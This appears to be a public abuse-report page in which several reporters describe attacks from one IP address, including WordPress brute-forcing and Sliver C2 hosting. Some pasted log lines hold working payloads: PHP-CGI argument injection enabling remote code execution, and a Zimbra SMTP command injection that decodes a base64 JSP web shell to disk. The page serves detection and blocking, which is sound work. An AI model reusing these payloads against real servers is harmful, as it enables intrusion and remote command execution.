๐ง๐ท
dominioz
2026-09-03 09:28:47
(13 hours ago)
2026-09-03 09:28:01 POST /php-cgi/php-cgi.exe %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_e ...
show more
2026-09-03 09:28:01 POST /php-cgi/php-cgi.exe %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input - 130.94.92.169 HTTP/1.1 Mozilla/5.0+(Windows+NT+5.1;+rv:52.0)+Gecko/20100101+Firefox/52.0 - 404 5665
2026-09-03 09:28:01 POST /index.php %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input - 130.94.92.169 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+rv:38.0)+Gecko/20100101+Firefox/38.0 - 404 5650
2026-09-03 09:28:01 POST /test.php %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input - 130.94.92.169 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.6+Mobile/15E148+Safari/604.1 - 404 5648
2026-09-03 09:28:02 POST /test.hello %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp:/
...
show less
Web App Attack
๐ง๐ท
dominioz
2026-09-03 08:12:46
(14 hours ago)
2026-09-03 08:11:50 POST /php-cgi/php-cgi.exe %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_e ...
show more
2026-09-03 08:11:50 POST /php-cgi/php-cgi.exe %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input - 130.94.92.169 HTTP/1.1 Mozilla/5.0+(Macintosh;+PPC+Mac+OS+X+10_8_9+rv:6.0;+ms-MY)+AppleWebKit/532.11.2+(KHTML,+like+Gecko)+Version/5.0+Safari/532.11.2 - 404 5665
2026-09-03 08:11:50 POST /index.php %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input - 130.94.92.169 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Safari/605.1.15 - 404 5650
2026-09-03 08:11:51 POST /test.php %ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input - 130.94.92.169 HTTP/1.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.11;+rv:140.0)+Gecko/20100101+Firefox/140.0 - 404 5648
2026-09-03 08:11:51 POST /test.hello %ADd+cgi.force_redirect%3d0+%ADd+cgi.redir
...
show less
Web App Attack
๐ณ๐ฑ
JCB
2026-09-01 15:17:00
(2 days ago)
Probing for CVE-2026-73570
Brute-Force
Exploited Host
Hacking
๐บ๐พ
www.cure.edu.uy
2026-09-01 10:57:00
(2 days ago)
/var/log/mail.log:2026-08-31T16:27:09.642289-03:00 godel postfix/smtps/smtpd[1425255]: NOQUEUE: filt ...
show more
/var/log/mail.log:2026-08-31T16:27:09.642289-03:00 godel postfix/smtps/smtpd[1425255]: NOQUEUE: filter: RCPT from unknown[130.94.92.169]: <[email protected] >: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10024; from=<[email protected] > to=<"x: Service status change: localhost $(echo PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLmlvLioiICU+CjwlClN0cmluZyBjbWQgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigieGQiKTsKaWYgKGNtZCAhPSBudWxsICYmICFjbWQuaXNFbXB0eSgpKSB7CiAgICBQcm9jZXNzQnVpbGRlciBwYiA9IG5ldyBQcm9jZXNzQnVpbGRlcigiL2Jpbi9zaCIsICItYyIsIGNtZCk7CiAgICBwYi5yZWRpcmVjdEVycm9yU3RyZWFtKHRydWUpOwogICAgUHJvY2VzcyBwID0gcGIuc3RhcnQoKTsKICAgIEJ1ZmZlcmVkUmVhZGVyIHIgPSBuZXcgQnVmZmVyZWRSZWFkZXIobmV3IElucHV0U3RyZWFtUmVhZGVyKHAuZ2V0SW5wdXRTdHJlYW0oKSwgIlVURi04IikpOwogICAgU3RyaW5nQnVpbGRlciBzYiA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICBTdHJpbmcgbGluZTsKICAgIHdoaWxlICgobGluZSA9IHIucmVhZExpbmUoKSkgIT0gbnVsbCkgeyBzYi5hcHBlbmQobGluZSk7IHNiLmFwcGVuZCgiXG4iKTsgfQogICAgb3V0LnByaW50KCI8cHJlPiIgKyBzYi50b1N0cmluZygpICsgIjwvcHJlPiIpOwp9CiU+Cg== | base64 -d > /opt/zi
show less
Hacking
๐ฑ๐ป
bonux-s
2026-09-01 05:40:00
(2 days ago)
Zimbra SMTP command injection attempt ..
Hacking
๐ฉ๐ช
kkeyser
2026-08-31 18:21:11
(3 days ago)
zimbra CVE-2024-45519
Hacking
๐บ๐ธ
oralunal
2026-08-31 15:20:55
(3 days ago)
IP banned by Fail2Ban in jail oral-suss access.log mvfnds
...
Bad Web Bot
Web App Attack
๐ง๐ท
cibersecoptidata
2026-08-31 12:30:37
(3 days ago)
Zimbra SMTP command-injection attempt: RCPT TO address crafted to inject a fake Service status chang ...
show more
Zimbra SMTP command-injection attempt: RCPT TO address crafted to inject a fake Service status change" line into the mail log
show less
Hacking
Anonymous
2026-08-31 03:43:18
(3 days ago)
apache vulnerability scan
Web App Attack
๐ฎ๐ฉ
sockominfo
2026-08-28 17:00:52
(6 days ago)
Active Response: IP 130.94.92.169 Blocked via Firewall Drop, Access to sensitive configuration files ...
show more
Active Response: IP 130.94.92.169 Blocked via Firewall Drop, Access to sensitive configuration files detected (Success: 200).. Threat Score: 9/10 (CRITICAL). Confidence: 70%. CVSS v3.1: 10/10 (Critical). CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Bayesian Probability: 93%. MITRE ATT&CK: T1210 (Exploitation of Remote Services). Tactic: TA0001. Freshness: Fresh. Source Reputation: KNOWN_MALICIOUS. Methodology: CVSS 3.1 + Bayesian + Temporal + Environmental + MITRE ATT&CK + OWASP. Standards: ISO/IEC 27065:2022, NIST SP 800-30, IEEE S&P 2020. Reported by TangerangKota-CSIRT. Status: MALICIOUS
show less
Hacking
Web App Attack
๐ฎ๐ฉ
sockominfo
2026-08-28 16:00:13
(6 days ago)
Access to sensitive configuration files detected (Success: 200).. Threat Score: 7/10 (HIGH). Reporte ...
show more
Access to sensitive configuration files detected (Success: 200).. Threat Score: 7/10 (HIGH). Reported by TangerangKota-CSIRT. Status: MALICIOUS
show less
Hacking
Web App Attack
Anonymous
2026-08-28 09:09:05
(6 days ago)
apache vulnerability scan
Web App Attack
๐ซ๐ท
MeduzaCTI
2026-08-28 03:55:02
(6 days ago)
Indicator Report
Indicator: 130.94.92.169
Reporter: HeatherM
Description: Sliver C2 infrastructure ...
show more
Indicator Report
Indicator: 130.94.92.169
Reporter: HeatherM
Description: Sliver C2 infrastructure Shodan
Tags: Sliver,C2
Source: MeduzaCTI Platform
Reference: https://meduzacti.com
show less
Hacking
๐ฎ๐น
VHosting
2026-08-08 14:15:03
(3 weeks ago)
Detected WordPress attack from 4 different servers
Brute-Force
Web App Attack
๐ซ๐ท
Kimax
2026-08-08 14:08:29
(3 weeks ago)
RdpGuard detected brute-force attempt on HTTP
Brute-Force